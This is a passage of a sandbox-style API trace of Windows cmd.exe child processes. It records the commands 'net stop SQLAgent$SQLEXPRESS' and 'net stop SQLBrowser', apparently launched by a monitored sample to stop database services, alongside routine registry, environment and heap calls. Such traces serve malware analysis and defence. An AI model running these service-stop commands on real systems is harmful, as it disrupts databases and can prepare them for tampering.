_MaxCount=0x7) returned 3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.355] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.355] GetProcessHeap () returned 0x730000 [0069.355] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7434a8 | out: hHeap=0x730000) returned 1 [0069.355] GetProcessHeap () returned 0x730000 [0069.355] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xa) returned 0x73ff38 [0069.355] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.356] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SQLEXPRESS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x42f22c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SQLEXPRESS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x42f278 | out: lpCommandLine="net stop SQLAgent$SQLEXPRESS", lpProcessInformation=0x42f278*(hProcess=0x78, hThread=0x74, dwProcessId=0xadc, dwThreadId=0xad8)) returned 1 [0069.361] CloseHandle (hObject=0x74) returned 1 [0069.361] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.361] GetProcessHeap () returned 0x730000 [0069.361] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x745f10 | out: hHeap=0x730000) returned 1 [0069.361] GetEnvironmentStringsW () returned 0x745f10* [0069.361] GetProcessHeap () returned 0x730000 [0069.361] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xb36) returned 0x7440d0 [0069.361] FreeEnvironmentStringsW (penv=0x745f10) returned 1 [0069.361] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.276] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x42f16c | out: lpExitCode=0x42f16c*=0x2) returned 1 [0072.276] CloseHandle (hObject=0x78) returned 1 [0072.277] _vsnwprintf (in: _Buffer=0x42f2b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x42f178 | out: _Buffer="00000002") returned 8 [0072.277] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.277] GetProcessHeap () returned 0x730000 [0072.277] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7440d0 | out: hHeap=0x730000) returned 1 [0072.277] GetEnvironmentStringsW () returned 0x7440d0* [0072.277] GetProcessHeap () returned 0x730000 [0072.277] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xb5c) returned 0x7495b8 [0072.277] FreeEnvironmentStringsW (penv=0x7440d0) returned 1 [0072.277] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.277] GetProcessHeap () returned 0x730000 [0072.277] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7495b8 | out: hHeap=0x730000) returned 1 [0072.277] GetEnvironmentStringsW () returned 0x7440d0* [0072.277] GetProcessHeap () returned 0x730000 [0072.277] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xb5c) returned 0x7495b8 [0072.277] FreeEnvironmentStringsW (penv=0x7440d0) returned 1 [0072.277] GetProcessHeap () returned 0x730000 [0072.278] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x73ff38 | out: hHeap=0x730000) returned 1 [0072.278] DeleteProcThreadAttributeList (in: lpAttributeList=0x42f1d0 | out: lpAttributeList=0x42f1d0) [0072.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.278] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.278] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.278] SetConsoleInputExeNameW () returned 0x1 [0072.278] GetConsoleOutputCP () returned 0x1b5 [0072.279] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.279] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.279] exit (_Code=2) Process: id = "37" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1b99000" os_pid = "0x7d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLBrowser" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 140 os_tid = 0x948 [0069.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfefc | out: lpSystemTimeAsFileTime=0x1cfefc*(dwLowDateTime=0x981a3e90, dwHighDateTime=0x1d57b18)) [0069.228] GetCurrentProcessId () returned 0x7d4 [0069.228] GetCurrentThreadId () returned 0x948 [0069.228] GetTickCount () returned 0x114b452 [0069.228] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfef4 | out: lpPerformanceCount=0x1cfef4*=18944965324) returned 1 [0069.229] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.229] __set_app_type (_Type=0x1) [0069.229] __p__fmode () returned 0x74eb31f4 [0069.229] __p__commode () returned 0x74eb31fc [0069.229] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.229] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.230] GetCurrentThreadId () returned 0x948 [0069.230] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x948) returned 0x60 [0069.230] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.230] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.230] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.230] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.230] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfe8c | out: phkResult=0x1cfe8c*=0x0) returned 0x2 [0069.230] VirtualQuery (in: lpAddress=0x1cfec3, lpBuffer=0x1cfe5c, dwLength=0x1c | out: lpBuffer=0x1cfe5c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.230] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfe5c, dwLength=0x1c | out: lpBuffer=0x1cfe5c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.230] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfe5c, dwLength=0x1c | out: lpBuffer=0x1cfe5c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.230] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfe5c, dwLength=0x1c | out: lpBuffer=0x1cfe5c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.230] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfe5c, dwLength=0x1c | out: lpBuffer=0x1cfe5c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0069.231] GetConsoleOutputCP () returned 0x1b5 [0069.231] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.231] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.231] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.231] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.232] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.232] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.232] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.232] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.232] GetEnvironmentStringsW () returned 0x5b2030* [0069.232] GetProcessHeap () returned 0x5a0000 [0069.232] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xaca) returned 0x5b2b08 [0069.232] FreeEnvironmentStringsW (penv=0x5b2030) returned 1 [0069.232] GetProcessHeap () returned 0x5a0000 [0069.232] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5b0c60 [0069.232] GetEnvironmentStringsW () returned 0x5b2030* [0069.232] GetProcessHeap () returned 0x5a0000 [0069.232] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xaca) returned 0x5b35e0 [0069.233] FreeEnvironmentStringsW (penv=0x5b2030) returned 1 [0069.233] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedfc | out: phkResult=0x1cedfc*=0x68) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x0, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x1, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x1, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x0, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x40, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x40, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x40, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.233] RegCloseKey (hKey=0x68) returned 0x0 [0069.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedfc | out: phkResult=0x1cedfc*=0x68) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x40, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x1, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x1, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x0, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.233] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x9, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.234] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x4, lpData=0x1cee08*=0x9, lpcbData=0x1cee00*=0x4) returned 0x0 [0069.234] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cee04, lpData=0x1cee08, lpcbData=0x1cee00*=0x1000 | out: lpType=0x1cee04*=0x0, lpData=0x1cee08*=0x9, lpcbData=0x1cee00*=0x1000) returned 0x2 [0069.234] RegCloseKey (hKey=0x68) returned 0x0 [0069.234] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0069.234] srand (_Seed=0x5d97ebb3) [0069.234] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLBrowser" [0069.234] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLBrowser" [0069.234] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.234] GetProcessHeap () returned 0x5a0000 [0069.234] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5b2030 [0069.234] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.234] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.234] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.234] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.234] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.234] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.234] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.234] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.234] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.235] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.235] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.235] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.235] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.235] GetProcessHeap () returned 0x5a0000 [0069.235] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2b08 | out: hHeap=0x5a0000) returned 1 [0069.235] GetEnvironmentStringsW () returned 0x5b2248* [0069.235] GetProcessHeap () returned 0x5a0000 [0069.235] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xae2) returned 0x5b4ba8 [0069.235] FreeEnvironmentStringsW (penv=0x5b2248) returned 1 [0069.235] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.235] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.235] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.235] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.235] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.235] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.235] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.235] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.235] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.235] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.235] GetProcessHeap () returned 0x5a0000 [0069.235] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x54) returned 0x5b5698 [0069.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfbc8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfbc8, lpFilePart=0x1cfbc4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cfbc4*="Desktop") returned 0x25 [0069.235] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.236] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf944 | out: lpFindFileData=0x1cf944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5b1eb0 [0069.236] FindClose (in: hFindFile=0x5b1eb0 | out: hFindFile=0x5b1eb0) returned 1 [0069.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf944 | out: lpFindFileData=0x1cf944*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5b1eb0 [0069.236] FindClose (in: hFindFile=0x5b1eb0 | out: hFindFile=0x5b1eb0) returned 1 [0069.236] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf944 | out: lpFindFileData=0x1cf944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5b1eb0 [0069.236] FindClose (in: hFindFile=0x5b1eb0 | out: hFindFile=0x5b1eb0) returned 1 [0069.236] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.236] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.236] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.236] GetProcessHeap () returned 0x5a0000 [0069.236] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4ba8 | out: hHeap=0x5a0000) returned 1 [0069.236] GetEnvironmentStringsW () returned 0x5b40b8* [0069.236] GetProcessHeap () returned 0x5a0000 [0069.236] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb36) returned 0x5b5ef8 [0069.237] FreeEnvironmentStringsW (penv=0x5b40b8) returned 1 [0069.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.237] GetProcessHeap () returned 0x5a0000 [0069.237] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5698 | out: hHeap=0x5a0000) returned 1 [0069.237] GetProcessHeap () returned 0x5a0000 [0069.237] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400e) returned 0x5b6a38 [0069.237] GetProcessHeap () returned 0x5a0000 [0069.237] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x34) returned 0x5b1eb0 [0069.237] GetProcessHeap () returned 0x5a0000 [0069.237] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b6a38 | out: hHeap=0x5a0000) returned 1 [0069.237] GetConsoleOutputCP () returned 0x1b5 [0069.644] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.644] GetUserDefaultLCID () returned 0x409 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfd08, cchData=128 | out: lpLCData="0") returned 2 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfd08, cchData=128 | out: lpLCData="0") returned 2 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfd08, cchData=128 | out: lpLCData="1") returned 2 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") 